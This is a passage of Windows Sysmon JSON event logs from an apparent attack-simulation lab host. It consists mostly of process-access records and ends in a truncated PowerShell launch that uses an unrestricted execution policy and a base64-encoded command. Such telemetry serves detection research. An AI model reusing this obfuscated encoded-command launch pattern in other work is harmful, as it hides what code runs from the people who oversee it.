YSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4499,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4500,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4501,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4502,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4503,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4504,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4505,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nSourceProcessId: 1256\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-0010BAB70600}\r\nTargetProcessId: 1988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","SourceProcessId":"1256","SourceThreadId":"2756","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-0010BAB70600}","TargetProcessId":"1988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4506,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.477\r\nProcessGuid: {A837DB8D-0312-5F25-0000-001089B80600}\r\nProcessId: 3904\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3